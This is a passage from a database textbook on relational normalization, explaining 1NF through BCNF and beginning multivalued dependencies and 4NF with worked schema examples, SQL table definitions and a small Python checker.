■ A series of normal form tests that can be carried out on individual relation
schemas so that the relational database can be normalized to any desired
degree

Definition. The normal form of a relation refers to the highest normal form
condition that it meets, and hence indicates the degree to which it has been nor-
malized.

Normal forms, when considered in isolation from other factors, do not guarantee a
good database design. It is generally not sufficient to check separately that each


relation schema in the database is, say, in BCNF or 3NF. Rather, the process of nor-
malization through decomposition must also confirm the existence of additional
properties that the relational schemas, taken together, should possess. These would
include two properties:

■ The nonadditive join or lossless join property, which guarantees that the
spurious tuple generation problem discussed in Section 1.4 does not occur
with respect to the relation schemas created after decomposition.

■ The dependency preservation property, which ensures that each functional
dependency is represented in some individual relation resulting after
decomposition.

The nonadditive join property is extremely critical and must be achieved at any
cost, whereas the dependency preservation property, although desirable, is some-
times sacrificed.

3.2 Practical Use of Normal Forms
Most practical design projects acquire existing designs of databases from previous
designs, designs in legacy models, or from existing files. Normalization is carried
out in practice so that the resulting designs are of high quality and meet the desir-
able properties stated previously. Although several higher normal forms have been
defined, such as the 4NF and 5NF that we discuss in Sections 6 and 7, the practical
utility of these normal forms becomes questionable when the constraints on which
they are based are rare, and hard to understand or to detect by the database design-
ers and users who must discover these constraints. Thus, database design as prac-
ticed in industry today pays particular attention to normalization only up to 3NF,
BCNF, or at most 4NF.

Another point worth noting is that the database designers need not normalize to the
highest possible normal form. Relations may be left in a lower normalization status,
such as 2NF, for performance reasons, such as those discussed at the end of Section
1.2. Doing so incurs the corresponding penalties of dealing with the anomalies.

Definition. Denormalization is the process of storing the join of higher nor-
mal form relations as a base relation, which is in a lower normal form.

3.3 Definitions of Keys and Attributes
Participating in Keys

Before proceeding further, let’s look again at the definitions of keys of a relation
schema.

Definition. A superkey of a relation schema R = {A1, A2, … , An} is a set of
attributes S ⊆ R with the property that no two tuples t1 and t2 in any legal rela-
tion state r of R will have t1[S] = t2[S]. A key K is a superkey with the additional
property that removal of any attribute from K will cause K not to be a superkey
any more.


The difference between a key and a superkey is that a key has to be minimal; that is,
if we have a key K = {A1, A2, …, Ak} of R, then K – {Ai} is not a key of R for any Ai, 1
≤ i ≤ k. In Figure 1, {Ssn} is a key for EMPLOYEE, whereas {Ssn}, {Ssn, Ename}, {Ssn,
Ename, Bdate}, and any set of attributes that includes Ssn are all superkeys.

If a relation schema has more than one key, each is called a candidate key. One of
the candidate keys is arbitrarily designated to be the primary key, and the others are
called secondary keys. In a practical relational database, each relation schema must
have a primary key. If no candidate key is known for a relation, the entire relation
can be treated as a default superkey. In Figure 1, {Ssn} is the only candidate key for
EMPLOYEE, so it is also the primary key.

Definition. An attribute of relation schema R is called a prime attribute of R if
it is a member of some candidate key of R. An attribute is called nonprime if it
is not a prime attribute—that is, if it is not a member of any candidate key.

In Figure 1, both Ssn and Pnumber are prime attributes of WORKS_ON, whereas
other attributes of WORKS_ON are nonprime.

We now present the first three normal forms: 1NF, 2NF, and 3NF. These were pro-
posed by Codd (1972a) as a sequence to achieve the desirable state of 3NF relations
by progressing through the intermediate states of 1NF and 2NF if needed. As we
shall see, 2NF and 3NF attack different problems. However, for historical reasons, it
is customary to follow them in that sequence; hence, by definition a 3NF relation
already satisfies 2NF.

3.4 First Normal Form
First normal form (1NF) is now considered to be part of the formal definition of a
relation in the basic (flat) relational model; historically, it was defined to disallow
multivalued attributes, composite attributes, and their combinations. It states that
the domain of an attribute must include only atomic (simple, indivisible) values and
that the value of any attribute in a tuple must be a single value from the domain of
that attribute. Hence, 1NF disallows having a set of values, a tuple of values, or a
combination of both as an attribute value for a single tuple. In other words, 1NF dis-
allows relations within relations or relations as attribute values within tuples. The only
attribute values permitted by 1NF are single atomic (or indivisible) values.

Consider the DEPARTMENT relation schema shown in Figure 1, whose primary key
is Dnumber, and suppose that we extend it by including the Dlocations attribute as
shown in Figure 9(a). We assume that each department can have a number of loca-
tions. The DEPARTMENT schema and a sample relation state are shown in Figure 9.
As we can see, this is not in 1NF because Dlocations is not an atomic attribute, as
illustrated by the first tuple in Figure 9(b). There are two ways we can look at the
Dlocations attribute:

■ The domain of Dlocations contains atomic values, but some tuples can have a
set of these values. In this case, Dlocations is not functionally dependent on
the primary key Dnumber.


Dname
DEPARTMENT
(a)

DEPARTMENT
(b)

DEPARTMENT
(c)

Dnumber Dmgr_ssn Dlocations

Dname
Research

Administration

Headquarters 1

5

4

Dnumber

888665555

333445555

987654321

Dmgr_ssn

{Houston}

{Bellaire, Sugarland, Houston}

{Stafford}

Dlocations

Dname
Research

Research

Research

Administration

Headquarters

Bellaire

Sugarland

Houston

Stafford

Houston

5

5

5

4

1

Dnumber

333445555

333445555

333445555

987654321

888665555

Dmgr_ssn Dlocation
Figure 9
Normalization into 1NF. (a) A
relation schema that is not in
1NF. (b) Sample state of
relation DEPARTMENT. (c)
1NF version of the same
relation with redundancy.

■ The domain of Dlocations contains sets of values and hence is nonatomic. In
this case, Dnumber → Dlocations because each set is considered a single mem-
ber of the attribute domain.9

In either case, the DEPARTMENT relation in Figure 9 is not in 1NF; in fact, it does
not even qualify as a relation. There are three main techniques to achieve first nor-
mal form for such a relation:

1. Remove the attribute Dlocations that violates 1NF and place it in a separate
relation DEPT_LOCATIONS along with the primary key Dnumber of
DEPARTMENT. The primary key of this relation is the combination
{Dnumber, Dlocation}, as shown in Figure 2. A distinct tuple in
DEPT_LOCATIONS exists for each location of a department. This decomposes
the non-1NF relation into two 1NF relations.

9In this case we can consider the domain of Dlocations to be the power set of the set of single loca-
tions; that is, the domain is made up of all possible subsets of the set of single locations.


2. Expand the key so that there will be a separate tuple in the original
DEPARTMENT relation for each location of a DEPARTMENT, as shown in
Figure 9(c). In this case, the primary key becomes the combination
{Dnumber, Dlocation}. This solution has the disadvantage of introducing
redundancy in the relation.

3. If a maximum number of values is known for the attribute—for example, if it
is known that at most three locations can exist for a department—replace the
Dlocations attribute by three atomic attributes: Dlocation1, Dlocation2, and
Dlocation3. This solution has the disadvantage of introducing NULL values if
most departments have fewer than three locations. It further introduces spu-
rious semantics about the ordering among the location values that is not
originally intended. Querying on this attribute becomes more difficult; for
example, consider how you would write the query: List the departments that
have ‘Bellaire’ as one of their locations in this design.

Of the three solutions above, the first is generally considered best because it does
not suffer from redundancy and it is completely general, having no limit placed on
a maximum number of values. In fact, if we choose the second solution, it will be
decomposed further during subsequent normalization steps into the first solution.
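
As a sketch of the first technique in SQL (attribute names as in Figure 2; the data types are assumptions for illustration):

CREATE TABLE DEPT_LOCATIONS (
  Dnumber    INT          NOT NULL,
  Dlocation  VARCHAR(30)  NOT NULL,
  PRIMARY KEY (Dnumber, Dlocation),
  FOREIGN KEY (Dnumber) REFERENCES DEPARTMENT (Dnumber)
);

Each location of a department becomes one tuple of DEPT_LOCATIONS, while DEPARTMENT itself keeps only its single-valued attributes.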

First normal form also disallows multivalued attributes that are themselves com-
posite. These are called nested relations because each tuple can have a relation
within it. Figure 10 shows how the EMP_PROJ relation could appear if nesting is
allowed. Each tuple represents an employee entity, and a relation PROJS(Pnumber,
Hours) within each tuple represents the employee’s projects and the hours per week
that employee works on each project. The schema of this EMP_PROJ relation can be
represented as follows:

EMP_PROJ(Ssn, Ename, {PROJS(Pnumber, Hours)})

The set braces { } identify the attribute PROJS as multivalued, and we list the com-
ponent attributes that form PROJS between parentheses ( ). Interestingly, recent
trends for supporting complex objects and XML data attempt to allow and formal-
ize nested relations within relational database systems, which were disallowed early
on by 1NF.

Notice that Ssn is the primary key of the EMP_PROJ relation in Figures 10(a) and
(b), while Pnumber is the partial key of the nested relation; that is, within each tuple,
the nested relation must have unique values of Pnumber. To normalize this into 1NF,
we remove the nested relation attributes into a new relation and propagate the pri-
mary key into it; the primary key of the new relation will combine the partial key
with the primary key of the original relation. Decomposition and primary key
propagation yield the schemas EMP_PROJ1 and EMP_PROJ2, as shown in Figure
10(c).

This procedure can be applied recursively to a relation with multiple-level nesting
to unnest the relation into a set of 1NF relations. This is useful in converting an
unnormalized relation schema with many levels of nesting into 1NF relations. The


Figure 10
Normalizing nested relations into 1NF. (a) Schema of the EMP_PROJ relation with a nested relation attribute PROJS. (b) Sample extension of the EMP_PROJ relation showing nested relations within each tuple. (c) Decomposition of EMP_PROJ into relations EMP_PROJ1 and EMP_PROJ2 by propagating the primary key.

existence of more than one multivalued attribute in one relation must be handled
carefully. As an example, consider the following non-1NF relation:

PERSON (Ss#, {Car_lic#}, {Phone#})

This relation represents the fact that a person has multiple cars and multiple
phones. If strategy 2 above is followed, it results in an all-key relation:

PERSON_IN_1NF (Ss#, Car_lic#, Phone#)


To avoid introducing any extraneous relationship between Car_lic# and Phone#, all
possible combinations of values are represented for every Ss#, giving rise to redun-
dancy. This leads to the problems handled by multivalued dependencies and 4NF,
which we will discuss in Section 6. The right way to deal with the two multivalued
attributes in PERSON shown previously is to decompose it into two separate rela-
tions, using strategy 1 discussed above: P1(Ss#, Car_lic#) and P2(Ss#, Phone#).
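
A sketch of this strategy 1 decomposition in SQL follows; the '#' characters are dropped from the attribute names to keep them legal identifiers, and the data types are assumptions:

CREATE TABLE P1 (
  Ssn      CHAR(9)      NOT NULL,
  Car_lic  VARCHAR(10)  NOT NULL,
  PRIMARY KEY (Ssn, Car_lic)
);

CREATE TABLE P2 (
  Ssn    CHAR(9)      NOT NULL,
  Phone  VARCHAR(15)  NOT NULL,
  PRIMARY KEY (Ssn, Phone)
);

Each independent multivalued attribute is stored in its own relation, so no artificial combinations of cars and phones are ever recorded.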

3.5 Second Normal Form
Second normal form (2NF) is based on the concept of full functional dependency. A
functional dependency X → Y is a full functional dependency if removal of any
attribute A from X means that the dependency does not hold any more; that is, for
any attribute A ∈ X, (X – {A}) does not functionally determine Y. A functional
dependency X → Y is a partial dependency if some attribute A ∈ X can be removed
from X and the dependency still holds; that is, for some A ∈ X, (X – {A}) → Y. In
Figure 3(b), {Ssn, Pnumber} → Hours is a full dependency (neither Ssn → Hours nor
Pnumber → Hours holds). However, the dependency {Ssn, Pnumber} → Ename is par-
tial because Ssn → Ename holds.

Definition. A relation schema R is in 2NF if every nonprime attribute A in R is
fully functionally dependent on the primary key of R.

The test for 2NF involves testing for functional dependencies whose left-hand side
attributes are part of the primary key. If the primary key contains a single attribute,
the test need not be applied at all. The EMP_PROJ relation in Figure 3(b) is in 1NF
but is not in 2NF. The nonprime attribute Ename violates 2NF because of FD2, as do
the nonprime attributes Pname and Plocation because of FD3. The functional
dependencies FD2 and FD3 make Ename, Pname, and Plocation partially dependent
on the primary key {Ssn, Pnumber} of EMP_PROJ, thus violating the 2NF test.

If a relation schema is not in 2NF, it can be second normalized or 2NF normalized
into a number of 2NF relations in which nonprime attributes are associated only
with the part of the primary key on which they are fully functionally dependent.
Therefore, the functional dependencies FD1, FD2, and FD3 in Figure 3(b) lead to the
decomposition of EMP_PROJ into the three relation schemas EP1, EP2, and EP3
shown in Figure 11(a), each of which is in 2NF.
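
As a sketch of this 2NF decomposition in SQL (attribute names as in Figure 3(b); data types are assumptions):

CREATE TABLE EP1 (
  Ssn      CHAR(9)       NOT NULL,
  Pnumber  INT           NOT NULL,
  Hours    DECIMAL(4,1),
  PRIMARY KEY (Ssn, Pnumber)    -- Hours depends on the whole key (FD1)
);

CREATE TABLE EP2 (
  Ssn    CHAR(9)      NOT NULL,
  Ename  VARCHAR(50),
  PRIMARY KEY (Ssn)             -- Ename depends on Ssn alone (FD2)
);

CREATE TABLE EP3 (
  Pnumber    INT          NOT NULL,
  Pname      VARCHAR(30),
  Plocation  VARCHAR(30),
  PRIMARY KEY (Pnumber)         -- Pname, Plocation depend on Pnumber alone (FD3)
);

Every nonprime attribute is now fully functionally dependent on the primary key of its own relation.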

3.6 Third Normal Form
Third normal form (3NF) is based on the concept of transitive dependency. A
functional dependency X → Y in a relation schema R is a transitive dependency if
there exists a set of attributes Z in R that is neither a candidate key nor a subset of
any key of R,10 and both X → Z and Z → Y hold. The dependency Ssn → Dmgr_ssn
is transitive through Dnumber in EMP_DEPT in Figure 3(a), because both the

10This is the general definition of transitive dependency. Because we are concerned only with primary
keys in this section, we allow transitive dependencies where X is the primary key but Z may be (a subset
of) a candidate key.


Figure 11
Normalizing into 2NF and 3NF. (a) Normalizing EMP_PROJ into 2NF relations. (b) Normalizing EMP_DEPT into 3NF relations.

dependencies Ssn → Dnumber and Dnumber → Dmgr_ssn hold and Dnumber is nei-
ther a key itself nor a subset of the key of EMP_DEPT. Intuitively, we can see that
the dependency of Dmgr_ssn on Dnumber is undesirable in EMP_DEPT since
Dnumber is not a key of EMP_DEPT.

Definition. According to Codd’s original definition, a relation schema R is in
3NF if it satisfies 2NF and no nonprime attribute of R is transitively dependent
on the primary key.

The relation schema EMP_DEPT in Figure 3(a) is in 2NF, since no partial depen-
dencies on a key exist. However, EMP_DEPT is not in 3NF because of the transitive
dependency of Dmgr_ssn (and also Dname) on Ssn via Dnumber. We can normalize


Table 1 Summary of Normal Forms Based on Primary Keys and Corresponding Normalization

First (1NF)
Test: Relation should have no multivalued attributes or nested relations.
Remedy (Normalization): Form new relations for each multivalued attribute or nested relation.

Second (2NF)
Test: For relations where the primary key contains multiple attributes, no nonkey attribute should be functionally dependent on a part of the primary key.
Remedy (Normalization): Decompose and set up a new relation for each partial key with its dependent attribute(s). Make sure to keep a relation with the original primary key and any attributes that are fully functionally dependent on it.

Third (3NF)
Test: Relation should not have a nonkey attribute functionally determined by another nonkey attribute (or by a set of nonkey attributes). That is, there should be no transitive dependency of a nonkey attribute on the primary key.
Remedy (Normalization): Decompose and set up a relation that includes the nonkey attribute(s) that functionally determine(s) other nonkey attribute(s).

EMP_DEPT by decomposing it into the two 3NF relation schemas ED1 and ED2
shown in Figure 11(b). Intuitively, we see that ED1 and ED2 represent independent
entity facts about employees and departments. A NATURAL JOIN operation on ED1
and ED2 will recover the original relation EMP_DEPT without generating spurious
tuples.
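
The claim that the original information is recovered can be checked by joining on the (foreign key, primary key) pair Dnumber. A sketch, assuming the ED1 and ED2 attributes shown in Figure 11(b):

SELECT E.Ename, E.Ssn, E.Bdate, E.Address, E.Dnumber, D.Dname, D.Dmgr_ssn
FROM   ED1 AS E
JOIN   ED2 AS D ON E.Dnumber = D.Dnumber;

Because Dnumber is the primary key of ED2, each ED1 tuple matches exactly one ED2 tuple, so the result is precisely the EMP_DEPT extension and no spurious tuples can appear.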

Intuitively, we can see that any functional dependency in which the left-hand side is
part (a proper subset) of the primary key, or any functional dependency in which
the left-hand side is a nonkey attribute, is a problematic FD. 2NF and 3NF normal-
ization remove these problem FDs by decomposing the original relation into new
relations. In terms of the normalization process, it is not necessary to remove the
partial dependencies before the transitive dependencies, but historically, 3NF has
been defined with the assumption that a relation is tested for 2NF first before it is
tested for 3NF. Table 1 informally summarizes the three normal forms based on pri-
mary keys, the tests used in each case, and the corresponding remedy or normaliza-
tion performed to achieve the normal form.

4 General Definitions of Second
and Third Normal Forms

In general, we want to design our relation schemas so that they have neither partial
nor transitive dependencies because these types of dependencies cause the update
anomalies discussed in Section 1.2. The steps for normalization into 3NF relations
that we have discussed so far disallow partial and transitive dependencies on the
primary key. The normalization procedure described so far is useful for analysis in
practical situations for a given database where primary keys have already been
defined. These definitions, however, do not take other candidate keys of a relation, if


any, into account. In this section we give the more general definitions of 2NF and
3NF that take all candidate keys of a relation into account. Notice that this does not
affect the definition of 1NF since it is independent of keys and functional depen-
dencies. As a general definition of prime attribute, an attribute that is part of any
candidate key will be considered as prime. Partial and full functional dependencies
and transitive dependencies will now be considered with respect to all candidate keys
of a relation.

4.1 General Definition of Second Normal Form
Definition. A relation schema R is in second normal form (2NF) if every non-
prime attribute A in R is not partially dependent on any key of R.11

The test for 2NF involves testing for functional dependencies whose left-hand side
attributes are part of the primary key. If the primary key contains a single attribute,
the test need not be applied at all. Consider the relation schema LOTS shown in
Figure 12(a), which describes parcels of land for sale in various counties of a state.
Suppose that there are two candidate keys: Property_id# and {County_name, Lot#};
that is, lot numbers are unique only within each county, but Property_id# numbers
are unique across counties for the entire state.

Based on the two candidate keys Property_id# and {County_name, Lot#}, the func-
tional dependencies FD1 and FD2 in Figure 12(a) hold. We choose Property_id# as
the primary key, so it is underlined in Figure 12(a), but no special consideration will
be given to this key over the other candidate key. Suppose that the following two
additional functional dependencies hold in LOTS:

FD3: County_name → Tax_rate
FD4: Area → Price

In words, the dependency FD3 says that the tax rate is fixed for a given county (does
not vary lot by lot within the same county), while FD4 says that the price of a lot is
determined by its area regardless of which county it is in. (Assume that this is the
price of the lot for tax purposes.)

The LOTS relation schema violates the general definition of 2NF because Tax_rate is
partially dependent on the candidate key {County_name, Lot#}, due to FD3. To nor-
malize LOTS into 2NF, we decompose it into the two relations LOTS1 and LOTS2,
shown in Figure 12(b). We construct LOTS1 by removing the attribute Tax_rate that
violates 2NF from LOTS and placing it with County_name (the left-hand side of FD3
that causes the partial dependency) into another relation LOTS2. Both LOTS1 and
LOTS2 are in 2NF. Notice that FD4 does not violate 2NF and is carried over to
LOTS1.
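
A sketch of this decomposition in SQL (attribute names as in Figure 12, with the '#' dropped to keep them legal identifiers; data types and the foreign key link are assumptions):

CREATE TABLE LOTS2 (
  County_name  VARCHAR(30)   NOT NULL,
  Tax_rate     DECIMAL(6,4),
  PRIMARY KEY (County_name)               -- FD3: County_name -> Tax_rate
);

CREATE TABLE LOTS1 (
  Property_id  INT            NOT NULL,
  County_name  VARCHAR(30)    NOT NULL,
  Lot_num      INT            NOT NULL,
  Area         DECIMAL(8,2),
  Price        DECIMAL(12,2),
  PRIMARY KEY (Property_id),
  UNIQUE (County_name, Lot_num),          -- the second candidate key
  FOREIGN KEY (County_name) REFERENCES LOTS2 (County_name)
);

Tax_rate now appears once per county in LOTS2, keyed by the left-hand side of FD3, while both candidate keys of LOTS1 are declared on LOTS1 itself.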

11This definition can be restated as follows: A relation schema R is in 2NF if every nonprime attribute A
in R is fully functionally dependent on every key of R.


Figure 12
Normalization into 2NF and 3NF. (a) The LOTS relation with its functional dependencies FD1 through FD4. (b) Decomposing into the 2NF relations LOTS1 and LOTS2. (c) Decomposing LOTS1 into the 3NF relations LOTS1A and LOTS1B. (d) Summary of the progressive normalization of LOTS.


4.2 General Definition of Third Normal Form
Definition. A relation schema R is in third normal form (3NF) if, whenever a
nontrivial functional dependency X → A holds in R, either (a) X is a superkey of
R, or (b) A is a prime attribute of R.

According to this definition, LOTS2 (Figure 12(b)) is in 3NF. However, FD4 in LOTS1
violates 3NF because Area is not a superkey and Price is not a prime attribute in
LOTS1. To normalize LOTS1 into 3NF, we decompose it into the relation schemas
LOTS1A and LOTS1B shown in Figure 12(c). We construct LOTS1A by removing the
attribute Price that violates 3NF from LOTS1 and placing it with Area (the left-hand
side of FD4 that causes the transitive dependency) into another relation LOTS1B.
Both LOTS1A and LOTS1B are in 3NF.

Two points are worth noting about this example and the general definition of 3NF:

■ LOTS1 violates 3NF because Price is transitively dependent on each of the
candidate keys of LOTS1 via the nonprime attribute Area.

■ This general definition can be applied directly to test whether a relation
schema is in 3NF; it does not have to go through 2NF first. If we apply the
above 3NF definition to LOTS with the dependencies FD1 through FD4, we
find that both FD3 and FD4 violate 3NF. Therefore, we could decompose
LOTS into LOTS1A, LOTS1B, and LOTS2 directly. Hence, the transitive and
partial dependencies that violate 3NF can be removed in any order.

4.3 Interpreting the General Definition
of Third Normal Form

A relation schema R violates the general definition of 3NF if a functional depen-
dency X → A holds in R that does not meet either condition—meaning that it vio-
lates both conditions (a) and (b) of 3NF. This can occur due to two types of
problematic functional dependencies:

■ A nonprime attribute determines another nonprime attribute. Here we typ-
ically have a transitive dependency that violates 3NF.

■ A proper subset of a key of R functionally determines a nonprime attribute.
Here we have a partial dependency that violates 3NF (and also 2NF).

Therefore, we can state a general alternative definition of 3NF as follows:

Alternative Definition. A relation schema R is in 3NF if every nonprime attribute
of R meets both of the following conditions:

■ It is fully functionally dependent on every key of R.

■ It is nontransitively dependent on every key of R.


Figure 13
Boyce-Codd normal form. (a) BCNF normalization of LOTS1A with the functional dependency FD2 being lost in the decomposition. (b) A schematic relation R(A, B, C) with FDs; it is in 3NF, but not in BCNF.

5 Boyce-Codd Normal Form
Boyce-Codd normal form (BCNF) was proposed as a simpler form of 3NF, but it
was found to be stricter than 3NF. That is, every relation in BCNF is also in 3NF;
however, a relation in 3NF is not necessarily in BCNF. Intuitively, we can see the need
for a stronger normal form than 3NF by going back to the LOTS relation schema in
Figure 12(a) with its four functional dependencies FD1 through FD4. Suppose that
we have thousands of lots in the relation but the lots are from only two counties:
DeKalb and Fulton. Suppose also that lot sizes in DeKalb County are only 0.5, 0.6,
0.7, 0.8, 0.9, and 1.0 acres, whereas lot sizes in Fulton County are restricted to 1.1,
1.2, …, 1.9, and 2.0 acres. In such a situation we would have the additional func-
tional dependency FD5: Area → County_name. If we add this to the other dependen-
cies, the relation schema LOTS1A still is in 3NF because County_name is a prime
attribute.

The area of a lot that determines the county, as specified by FD5, can be represented
by 16 tuples in a separate relation R(Area, County_name), since there are only 16 pos-
sible Area values (see Figure 13). This representation reduces the redundancy of
repeating the same information in the thousands of LOTS1A tuples. BCNF is a
stronger normal form that would disallow LOTS1A and suggest the need for decom-
posing it.

Definition. A relation schema R is in BCNF if whenever a nontrivial functional
dependency X → A holds in R, then X is a superkey of R.


Figure 14
A relation TEACH (Student, Course, Instructor) that is in 3NF but not BCNF.

The formal definition of BCNF differs from the definition of 3NF in that condition
(b) of 3NF, which allows A to be prime, is absent from BCNF. That makes BCNF a
stronger normal form compared to 3NF. In our example, FD5 violates BCNF in
LOTS1A because Area is not a superkey of LOTS1A. Note that FD5 satisfies 3NF in
LOTS1A because County_name is a prime attribute (condition b), but this condition
does not exist in the definition of BCNF. We can decompose LOTS1A into two BCNF
relations LOTS1AX and LOTS1AY, shown in Figure 13(a). This decomposition loses
the functional dependency FD2 because its attributes no longer coexist in the same
relation after decomposition.

In practice, most relation schemas that are in 3NF are also in BCNF. Only if X → A
holds in a relation schema R with X not being a superkey and A being a prime
attribute will R be in 3NF but not in BCNF. The relation schema R shown in Figure
13(b) illustrates the general case of such a relation. Ideally, relational database
design should strive to achieve BCNF or 3NF for every relation schema. Achieving
the normalization status of just 1NF or 2NF is not considered adequate, since they
were developed historically as stepping stones to 3NF and BCNF.

As another example, consider Figure 14, which shows a relation TEACH with the fol-
lowing dependencies:

FD1: {Student, Course} → Instructor
FD2:12 Instructor → Course

Note that {Student, Course} is a candidate key for this relation and that the depen-
dencies shown follow the pattern in Figure 13(b), with Student as A, Course as B,
and Instructor as C. Hence this relation is in 3NF but not BCNF. Decomposition of
this relation schema into two schemas is not straightforward because it may be

12This dependency means that each instructor teaches only one course; it is a constraint of this particular application.


decomposed into one of the three following possible pairs:

1. {Student, Instructor} and {Student, Course}.

2. {Course, Instructor} and {Course, Student}.

3. {Instructor, Course} and {Instructor, Student}.

All three decompositions lose the functional dependency FD1. Of the three, decomposition 3
is the desirable one because it will not generate spurious tuples after a join.

A test to determine whether a decomposition is nonadditive (or lossless) is dis-
cussed under Property NJB. In general, a relation not in BCNF should be decom-
posed so as to meet this property.

We make sure that we meet this property, because a nonadditive decomposition is a
must during normalization. We may have to forgo the preservation of some
functional dependencies in the decomposed relations, as is the case in this example.
The algorithm gives decomposition 3 for TEACH, which yields the two relations
in BCNF:

(Instructor, Course) and (Instructor, Student)

Note that if we designate (Student, Instructor) as a primary key of the relation
TEACH, the FD Instructor → Course causes a partial (non-full-functional) depend-
ency of Course on a part of this key. This FD may be removed as a part of second
normalization yielding exactly the same two relations in the result. This is an
example of a case where we may reach the same ultimate BCNF design via alternate
paths of normalization.
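
A sketch of decomposition 3 in SQL; the relation names TEACH_COURSE and TEACH_STUDENT are ours, the attribute names follow Figure 14, and the data types are assumptions:

CREATE TABLE TEACH_COURSE (
  Instructor  VARCHAR(30)  NOT NULL,
  Course      VARCHAR(30)  NOT NULL,
  PRIMARY KEY (Instructor)                 -- enforces FD2: Instructor -> Course
);

CREATE TABLE TEACH_STUDENT (
  Instructor  VARCHAR(30)  NOT NULL,
  Student     VARCHAR(30)  NOT NULL,
  PRIMARY KEY (Instructor, Student),
  FOREIGN KEY (Instructor) REFERENCES TEACH_COURSE (Instructor)
);

Both relations are in BCNF, but FD1 ({Student, Course} → Instructor) can no longer be enforced by a key of either relation; this is the dependency that is sacrificed.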

6 Multivalued Dependency
and Fourth Normal Form

So far we have discussed the concept of functional dependency, which is by far the
most important type of dependency in relational database design theory, and nor-
mal forms based on functional dependencies. However, in many cases relations have
constraints that cannot be specified as functional dependencies. In this section, we
discuss the concept of multivalued dependency (MVD) and define fourth normal
form, which is based on this dependency. Multivalued dependencies are a conse-
quence of first normal form (1NF) (see Section 3.4), which disallows an attribute in
a tuple from having a set of values, and of the accompanying process of converting an
unnormalized relation into 1NF. If we have two or more multivalued independent
attributes in the same relation schema, we get into a problem of having to repeat
every value of one of the attributes with every value of the other attribute to keep
the relation state consistent and to maintain the independence among the attributes
involved. This constraint is specified by a multivalued dependency.


Figure 15
Fourth and fifth normal forms. (a) The EMP relation with two MVDs: Ename →→ Pname and Ename →→ Dname. (b) Decomposing the EMP relation into two 4NF relations EMP_PROJECTS and EMP_DEPENDENTS. (c) The relation SUPPLY with no MVDs is in 4NF but not in 5NF if it has the JD(R1, R2, R3). (d) Decomposing the relation SUPPLY into the 5NF relations R1, R2, and R3.

For example, consider the relation EMP shown in Figure 15(a). A tuple in this EMP
relation represents the fact that an employee whose name is Ename works on the
project whose name is Pname and has a dependent whose name is Dname. An
employee may work on several projects and may have several dependents, and the
employee’s projects and dependents are independent of one another.13 To keep the
relation state consistent, and to avoid any spurious relationship between the two
independent attributes, we must have a separate tuple to represent every combina-
tion of an employee’s dependent and an employee’s project. This constraint is spec-

13In an ER diagram, each would be represented as a multivalued attribute or as a weak entity type.


ified as a multivalued dependency on the EMP relation, which we define in this sec-
tion. Informally, whenever two independent 1:N relationships A:B and A:C are
mixed in the same relation, R(A, B, C), an MVD may arise.14

6.1 Formal Definition of Multivalued Dependency
Definition. A multivalued dependency X →→ Y specified on relation schema R,
where X and Y are both subsets of R, specifies the following constraint on any
relation state r of R: If two tuples t1 and t2 exist in r such that t1[X] = t2[X], then
two tuples t3 and t4 should also exist in r with the following properties,15 where
we use Z to denote (R – (X ∪ Y)):16

■ t3[X] = t4[X] = t1[X] = t2[X].

■ t3[Y] = t1[Y] and t4[Y] = t2[Y].

■ t3[Z] = t2[Z] and t4[Z] = t1[Z].

Whenever X →→ Y holds, we say that X multidetermines Y. Because of the symme-
try in the definition, whenever X →→ Y holds in R, so does X →→ Z. Hence, X →→ Y
implies X →→ Z, and therefore it is sometimes written as X →→ Y|Z.
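To make the formal definition concrete, the following is a minimal Python sketch (an
illustration only, not part of the text's formalism) that checks whether an MVD X →→ Y
holds in a relation state given as a list of dictionaries; the helper name mvd_holds and
the data layout are assumptions of this sketch. Because of the symmetry noted above,
requiring the tuple t3 for every ordered pair (t1, t2) also covers the required t4.

    from itertools import product

    def mvd_holds(state, X, Y, attrs):
        # Check X ->-> Y in 'state'; Z is everything in attrs outside X and Y.
        Z = [a for a in attrs if a not in set(X) | set(Y)]
        as_key = lambda t: tuple(sorted(t.items()))
        rel = {as_key(t) for t in state}
        for t1, t2 in product(state, repeat=2):
            if all(t1[a] == t2[a] for a in X):
                # required tuple t3: X and Y values from t1, Z values from t2
                t3 = {**{a: t1[a] for a in X + Y}, **{a: t2[a] for a in Z}}
                if as_key(t3) not in rel:
                    return False
        return True

    # EMP state of Figure 15(a)
    EMP = [{'Ename': 'Smith', 'Pname': 'X', 'Dname': 'John'},
           {'Ename': 'Smith', 'Pname': 'Y', 'Dname': 'Anna'},
           {'Ename': 'Smith', 'Pname': 'X', 'Dname': 'Anna'},
           {'Ename': 'Smith', 'Pname': 'Y', 'Dname': 'John'}]
    print(mvd_holds(EMP, ['Ename'], ['Pname'], ['Ename', 'Pname', 'Dname']))   # True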

An MVD X →→ Y in R is called a trivial MVD if (a) Y is a subset of X, or (b) X ∪ Y
= R. For example, the relation EMP_PROJECTS in Figure 15(b) has the trivial MVD
Ename →→ Pname. An MVD that satisfies neither (a) nor (b) is called a nontrivial
MVD. A trivial MVD will hold in any relation state r of R; it is called trivial because
it does not specify any significant or meaningful constraint on R.

If we have a nontrivial MVD in a relation, we may have to repeat values redundantly
in the tuples. In the EMP relation of Figure 15(a), the values ‘X’ and ‘Y’ of Pname are
repeated with each value of Dname (or, by symmetry, the values ‘John’ and ‘Anna’ of
Dname are repeated with each value of Pname). This redundancy is clearly undesir-
able. However, the EMP schema is in BCNF because no functional dependencies
hold in EMP. Therefore, we need to define a fourth normal form that is stronger
than BCNF and disallows relation schemas such as EMP. Notice that relations con-
taining nontrivial MVDs tend to be all-key relations—that is, their key is all their
attributes taken together. Furthermore, it is rare that such all-key relations with a
combinatorial occurrence of repeated values would be designed in practice.
However, recognition of MVDs as a potential problematic dependency is essential
in relational design.

We now present the definition of fourth normal form (4NF), which is violated
when a relation has undesirable multivalued dependencies, and hence can be used
to identify and decompose such relations.

14This MVD is denoted as A →→ B|C.
15The tuples t1, t2, t3, and t4 are not necessarily distinct.
16Z is shorthand for the attributes in R after the attributes in (X ∪ Y) are removed from R.


Definition. A relation schema R is in 4NF with respect to a set of dependencies
F (that includes functional dependencies and multivalued dependencies) if, for
every nontrivial multivalued dependency X →→ Y in F+,17 X is a superkey for R.

We can state the following points:

■ An all-key relation is always in BCNF since it has no FDs.

■ An all-key relation such as the EMP relation in Figure 15(a), which has no
FDs but has the MVD Ename →→ Pname | Dname, is not in 4NF.

■ A relation that is not in 4NF due to a nontrivial MVD must be decomposed
to convert it into a set of relations in 4NF.

■ The decomposition removes the redundancy caused by the MVD.

The process of normalizing a relation that is not in 4NF because of nontrivial MVDs
consists of decomposing it so that each MVD is represented by a separate relation
